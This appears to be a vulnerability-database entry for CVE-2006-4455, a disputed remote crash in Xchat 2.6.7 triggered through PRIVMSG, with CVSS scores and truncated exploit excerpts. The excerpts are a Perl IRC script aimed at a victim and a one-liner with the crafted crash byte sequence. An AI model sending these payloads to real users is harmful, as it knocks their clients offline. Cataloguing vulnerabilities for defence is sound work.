5
CVSSv2

CVE-2006-4455

Published: 30/08/2006 Updated: 17/05/2024
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 510
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

Unspecified vulnerability in Xchat 2.6.7 and previous versions allows remote malicious users to cause a denial of service (crash) via unspecified vectors involving the PRIVMSG command. NOTE: the vendor has disputed this vulnerability, stating that it does not affect 2.6.7 "or any recent version"

Vulnerable Product Search on Vulmon Subscribe to Product

xchat xchat

Exploits

#!/usr/bin/perl # rewritten because perl is more elegant than php # payload taken from original that ratboy submitted use strict; use Net::IRC; my ($nick, $server, $port, $channel, $victim) = @ARGV; my $irc = new Net::IRC; my $connect = $irc -> newconn (Nick => "$nick", Server => "$server", Port => $port, Ircname=> 'whatever') or ...
<? # another way to test this with irssi/bitchx <below> /str0ke # /exec -o perl -e 'print "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82"' ?> <?php // XChat <= 267 Windows Remote Crash DoS by ratboy // Tested on Windows SP1/SP2 // The follow ...